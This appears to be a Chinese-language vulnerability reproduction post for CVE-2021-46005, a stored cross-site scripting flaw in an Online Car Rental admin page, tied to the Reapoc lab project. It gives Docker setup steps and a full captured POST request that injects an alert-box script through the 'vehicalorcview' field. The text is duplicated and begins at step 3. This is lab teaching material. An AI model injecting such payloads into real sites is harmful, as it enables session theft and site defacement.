P.S. Reapoc项目 致力于提供最全的漏洞验证环境和标准化Poc,欢迎有兴趣的小伙伴共同建设。
https://github.com/cckuailong/reapoc
喜欢的同学帮忙点个star 0.0
本公众号以后的漏洞复现环境都会放到此项目中。
漏洞环境地址
https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget
拉起
docker-compose
3. 填写页面上的所有详细信息。提交后,burp捕获请求并把"vehicalorcview" 参数的值更改为"<script>alert("CAR")</script>"后提交
这里是我抓到的请求,将其中的cookie字段更改后即可。
POST /OnlineCarRental/admin/post-avehical.php HTTP/1.1Host: test.com:9202User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965Content-Length: 2085Origin: http://test.com:9202Connection: closeReferer: http://test.com:9202/OnlineCarRental/admin/post-avehical.phpUpgrade-Insecure-Requests: 1
-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="vehicletitle"
TestName-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="brandname"
2-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="vehicalorcview"
<script>alert("CAR")</script>-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="priceperday"
200-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="fueltype"
Diesel-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="modelyear"
2008-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="seatingcapacity"
22-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="img1"; filename="Untitled.png"Content-Type: image/png
PNG-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="img5"; filename=""Content-Type: application/octet-stream
-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="powerdoorlocks"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="antilockbrakingsys"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="driverairbag"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="passengerairbag"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="centrallocking"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="crashcensor"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="submit"
-----------------------------13786099262839578593645594965--
4. 访问http://localhost/car-rental/ and our Payload excuted,触发XSS。
https://github.com/cckuailong/reapoc
喜欢的同学帮忙点个star 0.0
本公众号以后的漏洞复现环境都会放到此项目中。
漏洞环境地址
https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-46005/vultarget
拉起
docker-compose
3. 填写页面上的所有详细信息。提交后,burp捕获请求并把"vehicalorcview" 参数的值更改为"<script>alert("CAR")</script>"后提交
这里是我抓到的请求,将其中的cookie字段更改后即可。
POST /OnlineCarRental/admin/post-avehical.php HTTP/1.1Host: test.com:9202User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965Content-Length: 2085Origin: http://test.com:9202Connection: closeReferer: http://test.com:9202/OnlineCarRental/admin/post-avehical.phpUpgrade-Insecure-Requests: 1
-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="vehicletitle"
TestName-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="brandname"
2-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="vehicalorcview"
<script>alert("CAR")</script>-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="priceperday"
200-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="fueltype"
Diesel-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="modelyear"
2008-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="seatingcapacity"
22-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="img1"; filename="Untitled.png"Content-Type: image/png
PNG-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="img5"; filename=""Content-Type: application/octet-stream
-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="powerdoorlocks"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="antilockbrakingsys"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="driverairbag"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="passengerairbag"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="centrallocking"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="crashcensor"
1-----------------------------13786099262839578593645594965Content-Disposition: form-data; name="submit"
-----------------------------13786099262839578593645594965--
4. 访问http://localhost/car-rental/ and our Payload excuted,触发XSS。
